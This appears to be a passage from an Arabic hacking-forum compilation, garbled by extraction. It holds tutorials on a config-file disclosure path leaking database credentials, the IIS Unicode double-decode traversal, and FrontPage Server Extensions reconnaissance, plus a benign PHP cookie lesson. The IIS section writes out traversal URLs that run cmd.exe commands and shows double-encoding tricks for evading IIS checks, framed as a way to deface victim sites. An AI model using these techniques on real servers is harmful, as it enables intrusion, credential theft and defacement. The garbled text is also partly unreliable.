تمكنك هذه الثغرة منمعرفةمعلومات مهمة عن ال DNS الخا صبالموقعبمافي ذلك DSN, UID<br />

…<br />

and PASS Database ..<br />

الثغرة : http://www.victim.<strong>com</strong>/adsamples/config/site.csc<br />

سیقوم المهاجمبانزالالمل فالمذكور ‏..وسی حصل علىمعلوما تقیمة وهامةأیضا<br />

<strong>١</strong><strong>١</strong>٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

::<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$$$$$$$<br />

الكاتب BURN_EG: ACID<br />

$$$$$$$$$$$$$$$$$$$<br />

‏"دراسة مفصلة وبعمق في الUniCode‏"‏<br />

السلام علیكم ورحمهاالله وبركاته<br />

ازیكم شبابایهاخباركمكلكم؟ اتمنىتكونوابخیرو.‏<br />

اعذرونى على غیبتى وانقطاعى عنكم ولكن واالله ظ رو ف رهیبه<br />

و الان خلونا نر غىفى شویهكلامفاضى على رأىبروكن<br />

كنت اتصفحالانترنت وادعبث شو ىو بعدین جمعت بع ض من المعلومات من ملفات مختلفه و هى تتحد ث<br />

عنالیونىكود ) طبعا الانمعظمكم سیستعجل و یقول یاههههه یونىكودقدیمه الخ<br />

اصبرلقد ذكرتالیونىكودفى المنتدیاتثلا ث مرات مره عنالصدیقبلاكهنتر و مره من الا خ هكس و<br />

مره عنالصدیق دیموناوابو خلودلكن هذه المره صدقونى ستكون مختلفهتمامالاختلا ف عن المرات<br />

( ولكنانااقوله<br />

....<br />

السابقه(‏ (Trust Me<br />

والان دعونا منهاالخرابیط و<br />

خلونا نقولالدرس یمكنیعجبكم::‏<br />

<br />

متى وجدتالیونىكود؟<br />

Found On 15 May 2001 BY NSFOCUS<br />

السیستیمزالتى تتأثربالثغره هى::‏<br />

All running IIS 4 / IIS 5 web server<br />

Windows 2k<br />

Windows 2k SP1 + SP2<br />

ثغرهالیونىكود ‏::هى عباره عنثغرهتسمحللهاكر بأن یشغلاوامربالقوهبصلاحیه مسموحبها<br />

یكونلهام<br />

‏(اى<br />

تیاز(‏ IUSR_machinename account<br />

وتحد ث هذهالثغرهاصلانتیجهان روتینال cgi الموجود على الویب سرفر نفسه یفك شفره عنوان<br />

الموقع مرتین و هذا ما نسمیهبال )DeCode لاتقلق ستفهم بعد ذلك<br />

(<br />

تعالىمعى<br />

خلینىاوض حلكایهالخرابی ط الىاناكاتبهافوقد ى<br />

ولیكن مثلا ::<br />

http://iisserver/scripts/..%5c..%...md.exe?/c+dir+c ‏


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

سرفر وبالتحدید هذاالفولدریسمى الفولدر التنفیذىاى(‏ executable directory<br />

و طبعا هذاالفولدرلیسلهاسمثابت هذافق ط مثال ولكن یمكنان یكونلهاسماءكثیره علىالملقم iis و<br />

ملحوظههامه::لا یوجد علىكل ملقم iis هذاالفولدرالتنفیذىاى executable directory<br />

واعتقدانالصدیقبلاك هنتر والا خ هك سقد ذكرومعظماسامى هذه الدیریكتورزفى شرحهم<br />

انارب طالدروس مع بع ض حتىتكون سلسله متكامله<br />

) فأناارید<br />

(<br />

؟ *<br />


hi_HaCkEr & MaXhAk2000<br />

(<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

هو مكتوبامامى ولكنتقدرتقولانهاالاوامر التىتأخذ فتره طویله حبتین مثل ping مثلا<br />

و مثلاهناك argumentأخر مثل Q/ و هذا نستخدمهفىاغلاقتفعیلامر echoكما هو واضحفى<br />

المثالفوق<br />

و هناكالكثیر من هذهال arguments و طبعا منها ما هواساسى لا یمكنكالتحكمفیه ‏(یعنى فتحهاو<br />

غلقه مثلال c‏/وال ) k/ و هناكاخرین یمكنكانتجعلهم on او off وبهذاتكونانت تتحكمبحالهال<br />

خاصتك ‏(یاری تتنفذالامر وتقرأالمكتوب لانك راحتلاقىتفاصیل الفتح والغلقبالتفصیل<br />

اصبروا علىقلیلا حتىانتهى منالامتحانالاولفى MCSEفى خلالاسبوعینان شاءااللهتعالى و بعد<br />

ذلكنعود اكثرقوه و نشرحلكم هذه النقطهبالتفصیلان شاءااللهبساصبرو شو ى<br />

اعتقدانكالانفهمت ما هىال arguments و مافائده c/ التىتكتبهافىالثغره وانا متأكدانك لا<br />

تعر فمعناها .<br />

تعالو نروحلنقطه سهله وبسیطه جداا فىالثغره ‏،ان تتشغلال cmd.exeلانكتریدان تتحكمبالموقع<br />

وتغیرالاندكس والخ و ولكنتعالى مثلا نشغلاى مل فتانى یاترىكی ف نشغله ؟<br />

انا راحاقلككی ف ‏::كل ما علیك فعله هوانتقومبوضعاسم الفایلالذىتریدتشغیلهبهذا الشكل<br />

بلا من cmd.exe?/c وبهذاتكونقد شغلتالفایل الذىتریده<br />

حیثتصبحالثغرهبهذاالشكل<br />

( و<br />

cmd<br />

Ping.exe+PRINT<br />

::<br />

( enjoy this ) .<br />

http://issserver/scripts/..%5c..%.../ping.exe+PRINT<br />

- +c/ ‏*وبالتالىكما عرفنافوقانا c‏/هىال argumentلل cmd.exeاوالحالهالتى سینفذ علیها<br />

الامراما علامهال ‏+التىبجانبال c‏/فهىبمقامالمسافهبین الكلمتینفىالثغره ولكن لا<br />

یمكننااسبدالهابمسافه عادیهو بعدها یكونالامر الذ ىیحمله سطرالاوامرلینفدهثم علامه ‏+ثانیه و<br />

بعدهااسم الدرای فالذ ىتعر ض محتویاته علىالشاشه حالیا<br />

.<br />

::<br />

ال cmd<br />

‏**و نأتىالان لاهم نقطهفىالثغره و هىاساسا سبب الثغرهكما ذكرنافىاولالكلام ‏(هوان سببالثغره<br />

یكون حل شفرهالعنواناكثر من مره ‏)و هذا ما نطلق علیهال decodeوانا شخصیاافصلالدیكودز على<br />

انهت حلیل حتى نصل لابس ط الحلكمافىالریاضیاتیعنى simplyfiey ا ىتبسیط وفك المعادلهتعالو<br />

خلینا نفهمكم هذا على الثغره نفسها<br />

‎255c..%255c‏%../هذاهو الدیكودا ىالت حلیلللاصل /....<br />

ولكن ماالذى نحاولان نفعلهبهذهالت حلیلات الغریبه ؟<br />

فن حن بذلكنحاولان ن حسن و نلعبفى مسارات الدیریكتورز ولكنللاسف لا یمكنكتغییراو اللعبفى<br />

الدیریكتورز لانال iis مزودبخاصیه عمل check على مثل هذهالدیكودز و منعها من التنفیذ و هنا یقع<br />

اصلثغرهالیونىكود و هوالت حلیللمرتیناو لاكثر من مرهفهمتمقصد ىالاناىانال iis مزود فعلا<br />

بخاصیهال check على هذهالدیكودز ولكنانتتضع الثغره وبها اكثر منت حلیل واحدلنف ساسم<br />

الموقع ولذلك یقومال iisبوظیفته المعتاده و هىال check و المنع علىالدیكودالاول و یظهرلهان<br />

كل شئبخیر وانهیسیطر علىالموق ف خخخخخخخخ ولكن الحقیقهانهیعملال checkمره واحده<br />

فتكونالنتیجهانالدیكودالثانى ینجحتمامافى محاولهاللعبفىالدیریكتورز وبالتالى یكوننتیجه الدیكود<br />

الثانى هوان یرجعالىاصله ا ى(‏ (slash /<br />

وتعالو ندخل ونتعمق اكثرفىتفاصیلالدیكودللثغره بعدان عرفنافكرتها ::<br />

شوفوفیه مادهاسمها <strong>com</strong>puter logic و الماده د ى راح درسفیها شئ یسمى HexaDecimal<br />

Valuesو هذهال valuesهىاساس الدیكود الذ ى نفعلهفىالثغرهاىانكل حر ف ص حیحاو حركه<br />

مثل ‏/فى الكمبیوترلها ما یسمىبال hexتعالىاوض value حلكاكثر<br />

::<br />

<strong>١</strong><strong>١</strong>٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

مثلا:‏ % ‎٢٠‎تعنى مسافه(‏space‏)‏<br />

هذا مثالبسیط واعتقدانكفهمتالانكلامى و طبعا یوجد جدوللهذهال hex values المساویه<br />

للحرو ف والحركاتالعادیهفى الكمبیوتر<br />

عوضا عنالحرو ف و الحركات العادیه الى السرفر و هذابالضبط ما نسمیهالت حلیلاوفك الشفرهاوال<br />

‏،اذناعتقدانكادركتتماماالانانكترسل hex values<br />

::<br />

decode<br />

تعالى نخ شفىتفاصیل الثغره اكثر و سنأخذالحركه التى نشرح علیها هىال ) (slash / حیثانها من<br />

اساسیات الدیكودفى هذهالثغره<br />

شو ففى جدولال hex value راح نجدانال<br />

فىانكتحذ فال ‏/وتضعبدلا منها هذا فتنجحالثغره ولكنانااقوللك هذا خطأ لان هذاهو<br />

الدیقودالاول وانا ذكر تانالدیكود یحد ث مرتیناو ممكناكثریعنىلو وضعت هذا الدیكودالاولفستجد<br />

انال iisلدیهالقدره علىان یمسك هذاالدیكود و یمكنعه منالتنفیذ ولذلك علیناانن حلل هذاال value<br />

حتىیتمالدیكودالتانى فتنجحالثغره<br />

وبالنظر الى جدولال hexadecimal values شو ف نجد هذا<br />

/ = ٥% , c طبعا هذاهوالدیكودالاولالذ ى ستفكرالان<br />

ال value<br />

::<br />

% = %25<br />

5 = %35<br />

c = %63<br />

ثم<br />

وبالتالى نجدانفسناقد خدعناال iisبأننا checker حللناال شفره مرتین وبالتالىفسن حصلفى<br />

المقابل علىالاصل و هو / وبالتالىتكونقد نجحت الثغره<br />

.<br />

فهمتمالان شبابمعنى دیكودالعنوان مرتین وفهمتماساس الثغره والدیكود مرتینلیسمعناهتكرار<br />

الت حلیلالاول مرتین ولكنمعناهت حلیل وفكالت حلیلالاولا ى simplify الى ابسط واطول صوره ممكنه<br />

فى نفسالوقت<br />

و عشانتوضح اكثرمعك راحاحطلككی ف التركیبهالصحللت حلیل<br />

::<br />

%255c %25 = % 5 = 5 c = c = %5c<br />

%%35c % = % %35 = 5 c = c = %5c<br />

%%35%63 % = % %35 = 5 %63 = c = %5c<br />

%25%35%63 %25 = % %35 = 5 %63 = c = %5c<br />

c =/٥% :<br />

ارائیتمالت حلیل طبعافىالاخر یجبانیساو ىالدیكودالاصل و هوكما هة واضحفى مثالناكلالت حلیلات<br />

تساو ى %٥ cوكما ذكرنا / = %5c ولكننا حللنا هذاالرمزالىاطول وابسطت حلیل حتى نخدعال iis<br />

checker .<br />

وفى النهایه بعدفهمناللثغره واساسهاهیاتعالو نطبقها مع بع<br />

سو ف نضع الثغرهفى هذاالشكل<br />

ض<br />

::<br />

http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s<br />

و ستدخلون علىالموقعبنجاح ولكن اكیدتلاحظون شئ جدیدقد زاد على الثغره و هذاالشىهوs‏/+‏<br />

<strong>١</strong><strong>١</strong>٨


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

هذا الرمز<br />

و عندماتدمج هذا الرمز معالثغرهكمافى المثال السابق سو فتأتیكلسته بكلفایلكبیر و صغیرفى<br />

كمبیوترالویب سرفر<br />

وااللهتعبتفى هذاالدرسوتعبتفىقرائهالمعلومات وتجمیعها عنالیونىكود حتىاصللهذاالشكل<br />

الاخوه وان شاءااللهانتظرو موضوعى القادم بعدمااكونانهی تامتحانىالاولفى)‏ MCSE ادعولى<br />

اختراقها وفائدهال<br />

بالنجاح ( و سیكون عباره عنتلخی صللتعامل مع شبكات ویندوز<br />

٢٠٠٠ وكیفیه<br />

....WIN2000 RESOURCE KIT<br />

<strong>١</strong><strong>١</strong>٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

تدریب على عملیة الإختراق بواسطة الیونیكود<br />

"<br />

:<br />

$$$$$$$$$$$$$$$$$<br />

الكاتب:‏ MaXhAk2000<br />

$$$$$$$$$$$$$$$$$<br />

بسماالله الرحمن الرحیم..‏<br />

كثرالكلام عن إختراقالمواقع بأنواعه والیوم عندي شرح عن ا لإختراق عن طریق الیونیكودأوبالأصح<br />

تطبیق عملي علىكیفیة ا لإختراق عن طریقالیونیكود وهذاالنو ع یعتبرللمبتدئین وهو الذيبإذنا الله<br />

سیوصلهمإلى طریق ا لإحترا ف.....‏<br />

***************************************************************************************<br />

بسماالله نبدأ...‏<br />

سیكونالتطبیق على جهازك وهو مثل الموقعأوالسیرفروتقوم بتطبیق الدرسكما وأنك على موقع<br />

مصاب.....‏<br />

لكيتتدرب علىإخت راقالمواقعقم بتركیب نظام ویندوز‎٢٠٠٠‎ على جهازك . وفي نفسالسیديتبعالنظام<br />

تقومبإ ضافة سیرفر IIS وذلك عن طریق<br />

قمبالذهابإلىلوحة التحكم.‏<br />

قمبالنقر علىإ ضافةإزالةبرامج.‏<br />

قمبالنقر على زر ‏"إ ضافةإزالة مكونات ویندوز<br />

قمبوضع علامة صح علىا<br />

هذابالنسبةلكیفیةتنزیلالسیرفر..‏<br />

اما عنكیفیةالتدرب على الجهازأياختراقهفقمبالتالي:<br />

قمبوضعالموقعفي مجلد wwwroot الموجود داخل مجلد Inetpub طبعا هتدخل علیه بعد ماتشغل<br />

السیرفر IIS عن طریق<br />

http://127.0.0.1/<br />

ولإیجاد الثغرةفيالجهاز والتدرب علیهاقم بتشغیلبرنامج عمران سكانأوأيبرنامجاخرللفح ص عن<br />

الثغراتتبعالیونیكود وقمبوضع العنوانتبعكاليهو<br />

وقم بتطبیقالمهاراتالتيتعلمتهافياختراق المواقعالمصابةبالیونیكود...‏<br />

http://127.0.0.1/<br />

."<br />

لخیار الأول.‏ IIS” “<br />

* <strong>١</strong><br />

* ٢<br />

* ٣<br />

* ٤<br />

<strong>١</strong> ٢٠


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

درس مفصل عن الكوكیز<br />

"<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$<br />

الكاتب Girl: Linux<br />

$$$$$$$$$$$$$<br />

مقدمة ‏:<br />

^^^^^^<br />

منالوسائلالمفیدةفيانشاء مواقعاكثرتفاعلیة ‏،فبواسطتها ست مكن من<br />

تعدالكعكات ‏(لا<br />

معرفة هلقامالمتصفح بزیارة موقعك منقبلاملا..‏<br />

cookies )<br />

<strong>١</strong>-<br />

في هذا الدرس سنتعر ف علىالكعكا ت وكیف یمكننااستخدامها...‏<br />

اقسام الدرس:‏<br />

معلومات عامة .<br />

‎٢‎‏-زراعةالكعكات على جهاز العمیل .<br />

٣ ‏-قراءةالكعكات من جهازالعمیل<br />

‎٤‎‏-تطبیق ‏:تخصی صلونالخلفیة.‏<br />

<br />

معلومات عامة<br />

^^^^^^^^<br />

.<br />

‏-ماهي ملفاتالكوكیز ؟<br />

^^^^^^^^^^^^^^<br />

ملفاتالكوكیز عبارة عن ملفات نصیة ‏،تقومالمواقع التيتزورهابإیداعها علىالقر صالصلبفي<br />

جهازك،‏ وتحتوي هذهالملفاتالنصیة علىمعلوماتتتیحللموقعالذيأودعهاأن یسترجعها عندالحاجة ،<br />

أي عند زیارتكالمقبلةللموقع .<br />

وتختل فالمعلوماتالتيتخزن ضمن ملفات الكوكیز من موقع لآخر ، ولكنلیس بإ مكان هذهالمواقع<br />

استرجا عأيمعلوماتإ ضافیة عنكأو عن جهازك ‏،باستثناءتلكالمعلوماتالمخزنةفيالمل فالنصي<br />

الخا صبها ، والتيتمإرسالها منقبلالموقع ، وبذلك لاتستطیع هذهالمواقعالاطلا ع على مضمون ملفات<br />

الكوكیزالأخرى ‏،أوأي ملفات خاصة على جهازك .<br />

‏-كی فیتمإیدا ع ملفات الكوكیز على جهازك ؟<br />

یرسلالمتصفح ، عندإدخالك عنوان موقعفي شری ط العناوین ، طلباًإلىالموقعالذي حددته،‏ متضمناً‏<br />

عنوان IP الخا صبه ، ونو عالمتصفحالذيتستخدمه ، ونظامالتشغیل الذي یدیر جهازك ‏.تخزّ‏ ن هذه<br />

المعلوماتفي ملفات خاصةبالمزود ، Files Log ولا علاقةللكوكیزبالمعلوماتالتيیتمإرسالها<br />

الوقت ذاته یبح ثالمتصفح عن ملفاتكوكیز ، التيتخ ص الموقعالمطلوب ‏،فإ ذا وجدهایتمإرسالها مع<br />

طلب مشاهدةالموقع ، وإ ذالمتوجد ‏،فإ نالموقع سیدركأن هذه زیارتك الأولىإلیه ‏،فیقومبإرسال ملفات<br />

الكوكیزإلى جهازك لتخزن علیه .<br />

. وفي<br />

<strong>١</strong>٢<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

وبإ مكانالموقعتغییرالمعلوماتالموجودة ضمن ملفاتالكوكیزأوإ ضافةمعلومات جدیدةكلماقمت بزیارة<br />

الموقع ‏.یتمتخزین بع ض ملفاتالكوكیزفي الذاكرةفقط ‏،ب حیث یجري حذفها مباشرة عندإغ لاقك<br />

المتصفح ، ولكنمعظمهاوتسمى ‏"ملفاتالكوكیزالمثابرة"‏ ‏،یتمتخزینهالفترة محددة علىالقر صالصلب<br />

ل حینانتهاء صلاحیتها وقدتدوم صلاحیتها مدةأشهرأو حتى سنوات ‏.أما بع ض ملفا تالكوكیزالتي<br />

تعر ضتاریخ صلاحیة لتاریخ سابق ‏،فإنهاتُ‏ حذ ف مباشرة ولاتُ‏ خز َّن علىقرصكالصلب<br />

المعلوماتالمخزنةفي ملفاتالكوكیزإلىمزودات الموقع الذيأصدرهافق ط،‏ وقدتعمم بع ضالشركات<br />

الكبرى ملفات الكوكیز التيتصدرها على جمیعمزوداتها،‏ لتنسیق المعلومات المتضمنة ، ولكي لاتصدر<br />

كل منمزوداتها ملفاتكوكیزللمستخدم ذاته ، عند زیارتهلصفحات مختلفةفيالموقع.‏<br />

. وتعود<br />

- مكونات مل فالكوكیز :<br />

^^^^^^^^^^^^^^<br />

یتكون عادة من عدةاجزاء هياسم المل ف ‏،قیمته،تاریخانتهاء مفعوله ، الموقعالمالكله ...<br />

زراعةالكعكات على جهاز العمیل : -<br />

أولا ‏:كی فتزر ع ملفات الكعكات<br />

یتم ذلكباستخدام الدالة setcookie وتعریفهابالشكلالتالي :<br />

:<br />

code:<br />

boolean setcookie ( string name [, string value [, int expire<br />

[, string path [, string domain [, int secure]]]]])<br />

تهمناالمدخلا ت الثلا ثالاولى و هي :<br />

: nameاياسم الكعكة ‏...فبامكانكارسال اكثر من كعكةالى متصفح واحد و عندها یصبحالاسم هو<br />

الطریقةالوحیدةللتمییز .<br />

: valueالقیمة<br />

‏...فقطقیم نصیة ‏...لا یمكنك وضع مصفوفةكقیمة و هذاأامر مهم ‏...لكنانتبهبامكانك<br />

وضع مصفوفةلكنبط ریقةاخرى ‏...؟كی ف ؟ ‏:استخدمالدالة serialize لتحویلاي متغیرفيبي ات ش<br />

بيالى شكل نصي و منثماستخدم unserializeلاعادتهالىالشكلالطبیعي.‏<br />

) <strong>١</strong> ینایر<br />

.<br />

--><br />

: expireاي عددالثواني منبدیة عصرالیونكس ( <strong>١</strong>٩٧٠ والتي بعدها سیقومالمتصفح<br />

على جهاز المستخدمبحذ ف الكعكة ... و هناثلا ث حالا ت:‏<br />

أولاً‏ ‏:أن یكون الوقت المعطىكمدخل اكثر من الوقت الحالي على جهاز العمیل و عندهاتخزن الكعكة<br />

على جهازالعمیل وتحذ ف عندانقضاءالمدة<br />

<strong>١</strong>٢٢


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

--><br />

ثانیاً‏ ‏:أن یكونالوقتالمعطىكمدخلاقل منالوقت على جهازالعمیل و عندها لا یقوم المتصفح على<br />

جهازالعمیل بتخزینها واذا وجدت كعكةبنفسالاسمفانه یحذفها حتىلولمتنتهي المدة<br />

ثالثاً‏ ‏:إ ذالمتحدد وقتافانالكعكةتخزنفي ذاكرة المتصفح وتفقد حالما یغلق المستخدم الموقع .<br />

.<br />

--><br />

: مثال<br />

code:<br />

<br />

منالدوالالمفیدة دالة time والتيترجعالوقتالحالي على شكل عدد الثواني منبدایة عصرالیونكس<br />

<strong>١</strong>) ینایر .(<strong>١</strong>٩٧٠<br />

ثانیاكیفتحذ فاوتعدل كعكة:‏<br />

لكيتحذ ف كعكة علیكأنترسل كعكةبنفس الاسم و خالیةالقیمة و ذات وقتاقل منالوقت على جهاز<br />

المستخدم<br />

مثال:‏<br />

code:<br />

<br />

ملاحظات :<br />

<strong>١</strong>- عندماتحددزمنا ماضیاًاجعلهقیمةكبیرةلكي تتفاد ىفارقالتوقی تبینالخادم والعمیل<br />

‎٢‎‏-لكيتعدلأي كعكة علیك حذفها وإرسالها من جدید .<br />

.<br />

ملاحظة مهمة :<br />

یجبانتستدعيالدالة setcookieقبلأنترسلاي شيءالىالمتصفح ‏..فمثلا الكودالتاليلنینجح<br />

:<br />

code:<br />

<strong>١</strong>٢٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

<br />

<br />

<br />

<br />

<br />

بللوكان هنالك مجرد سطرفار غقبل علامة البدایة ؟ ‏<br />

<br />

<br />

<strong>١</strong>٢٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

قراءةالكعكا ت من جهاز العمیل :<br />

‏-كی فتستقبلالمتغیرا ت من الكعكة<br />

..<br />

-:<br />

^^^^^^^^^^^^^^^^^^^^^<br />

مثال<br />

قلنابانهبامكانك ارسال اكثر من كعكةالى متصفح واحد<br />

عندما یطلبالمستخدم من متصفحهِ‏ صفحة على موقعكفانالمتصفح یقومبارسال جمیعالكعكاتالتيقمت<br />

ان ت بزراعتها عند المستخدم PHP ‏...تسهل علیكقراءة هذه الكعكات وتخزنهافي مصفوفةاسمها<br />

‏$_‏COOKIEو هي مصفوفة منالنو ع Associativeب Arrays حیثان المفتاح هواسمالكعكة و<br />

القیمةقیمة الكعكةكماارسلتها .<br />

:<br />

code:<br />

<br />

: و هذهتطبع<br />

code:<br />

palhackerz.<strong>com</strong><br />

تطبیق ‏:تخصی صلون الخلفیة<br />

كمثالبسیط دعنا نقومبانشاء موقع مبسط و نستخدم الكعكاتلكي نحفظلونالخلفیةالمحببةالىالشخ ص<br />

..<br />

‏-ماذالدینا ؟<br />

‎<strong>١</strong>‎‏-المل ف : user.php یقوم المل ف بعملیتین<br />


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

<br />

<br />

<br />

<br />

<br />

<br />


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

value=" INPUT‏>لا type="submit" تتذكرلوني المفضل"‏ ><br />

<br />


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

function clear_color(){<br />

setcookie('color',$_GET['color'],time()-36000);<br />

header('Location:index.php');<br />

}<br />

// selection<br />

if ($do=='display_form'){<br />

display_form();<br />

}elseif ($do=="set_color"){<br />

set_color();<br />

}elseif ($do=="clear_color"){<br />

clear_color();<br />

}<br />

?><br />

‏-الدالةالاولى display_formتقومفق ط بعر ض نموذجاختیاراللون .<br />

‏-الدالةالثانیة set_colorتقومبحفظاللون المختارفيكعكة وترجعالمستخدمالىالصفحةالرئیسیة .<br />

‏-الدالة الثالثة get_colorترجعقیمة اللون منالكعكة واذالم یكنهنالكقی مةفانهاترجعلون<br />

افتراضي وهوالابی ض .<br />

‏-الدالة الرابعة clear_colorتقومبمسحالكعكةبالطریقة التي ذكرناهافيالدرس .<br />

- ٢ مل ف ال : index.php<br />

مل ف عادي جداًالاانهیطلب الدالة get_color من مل ف user.phpكما یلي :<br />

<strong>١</strong>٢٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

code:<br />

<br />


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

معلومات مهمة عن المواقع التي تدعم الفرونت بیج<br />

"<br />

$$$$$$$$$$$$$$$$$$$<br />

T.O.L. ( DeXXa )<br />

$$$$$$$$$$$$$$$$$$$<br />

الكاتب:‏<br />

ماالذي یجبأنتعرفهقبلقراءة هذاالدرس<br />

‏*الالمامبالانجلیزیة<br />

‏*قراءة المزید عن ال<br />

:<br />

.<br />

FrontPage Server Extensions ولی سكیفیةاختراقه .<br />

‏*كیفیة التعامل معبرنامج . Microsoft Office FrontPage<br />

‏*كیفیة التعامل مع ال . CHMOD<br />

‏*كیفیة التعامل مع ال<br />

‏*كیفیة التعامل معبروتوكول . HTTP<br />

‏*كیفیة التعامل معقواعدالبیانات العلائقیة . SQL<br />

‏*كیفیة التعامل معأحدلغات الویب و التيتعملبناحیة الخادم<br />

Server Side Scripting<br />

. Telnet<br />

. Language<br />

واذكرأ خیراً‏ بأنياؤمن بأنالمخترق ماهوإلاانسان وظ یفتهالبرمجة وادارة وت حلیلالنظم والشبكا ت و<br />

لیسانسان همه هومعرفةالقلیل<br />

منالأمورالتيتساعدهفيالتخریب و العبثبماتعببهالآخرون وتضییعالوقتفي الدردشة و التسكع<br />

بمقاهيالانترن ت ، ولذافافتر ض بأن ما أقوله سیكون واضحاً‏ و لا یحتاجل . Screen Capture<br />

خریطة الموضو ع<br />

:<br />

@<br />

<br />

. ماالذي ستسفیده عندقراءةالموضو ع ؟<br />

FrontPage Server Extensions ؟<br />

FrontPage Extension Server ؟<br />

FrontPage Extension Server<br />

. مقدمة<br />

. ما هو ال<br />

. ما هي آلیة عمل ال<br />

‏.كیفیةالاتصالب<br />

‏.كیفیةمعرفة هلالموقع یدعم ال FrontPageأم لا<br />

‏.كیفیةاستغلالهلیصبحفي صلاحك<br />

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br />

@ ماالذي ستستفیده عندقراءتكللموضو ع ؟<br />

* ستعر ف ما هوال<br />

آلیة عمله<br />

‏*كیفیة جمع المعلومات الخاصة بأي موقع<br />

* بع ضالطرقللاستفادة منه عندالاتصالبالخادم الخا صبه<br />

. FrontPage Server Extensions<br />

.<br />

.<br />

.<br />

*<br />

<strong>١</strong>٣٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

: مقدمة<br />

@<br />

تسعى شركاتالتسكین بأنواعهاتوفیر شتى شبلالراحة لعملائها،‏ فتجدهم یقدمونالعرو ض والتخفیضات<br />

لارضاءالعملاء مثل دعمل PHP و<br />

. SQL و FTP و SSL و Perl و CGI<br />

وبالنسبةلمدارءالمواقع Webmastersفإ نالبرنامجالمفضللهم لتصمیم مواقعهم هو<br />

Office FrontPage والذيكما هو مبین یأتي<br />

معحزمة Office ‏،اذیتمیزبسهولةا ستعمالهكماانه یوفر بع ض البرمجیات مثل عداد الزوار ، ولذا<br />

تقدم شركاتالتسكین دعمكاملللبرنامج<br />

@ ما هوال<br />

Microsoft<br />

.<br />

FrontPage Server Extensions ؟<br />

ملاحظة<br />

سأتكلم حالیاً‏ عنالحزم التيأتت بعدحزمةالاصدار الثاني<br />

(<br />

:<br />

)<br />

.<br />

هو عبارة عنحزمة من البرامجیتمتثبیتهافي الخادم Serverالخا صبشركةالتسكین التيلهاقالبیة<br />

لدعم بع ضالخصائ ص<br />

و عندالتثبی ت یجبانشاء عدة مجلدا ت منها<br />

:<br />

private_/<br />

vti_bin_/<br />

vti_cnf_/<br />

vti_log_/<br />

vti_pvt_/<br />

vti_txt_/<br />

و سأتكلم عن وظ یفةكل مجلد یهمنا<br />

‏*المجلد<br />

:<br />

: vti_bin_<br />

ویتواجدبداخله مجلدان هما<br />

:<br />

ملاحظة ‏:النقطتانتشیرانإلىالمجلد<br />

( vti_bin_<br />

)<br />

/vti_adm_/..<br />

/vti_aut_/..<br />

الثاني لا یهمنا بقدر ما یهمالمجلدالأولاذأنه الخا<br />

علىكلمةالمرور الخاصةبه<br />

كما یوجد ملفانهما<br />

صبالمشر ف ولاتستطیعالاستفادة منهاذالمت حصل<br />

.<br />

:<br />

<strong>١</strong>٣<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

shtml.exe/..<br />

fpcount.exe/..<br />

‏*المجلد<br />

: vti_pvt_<br />

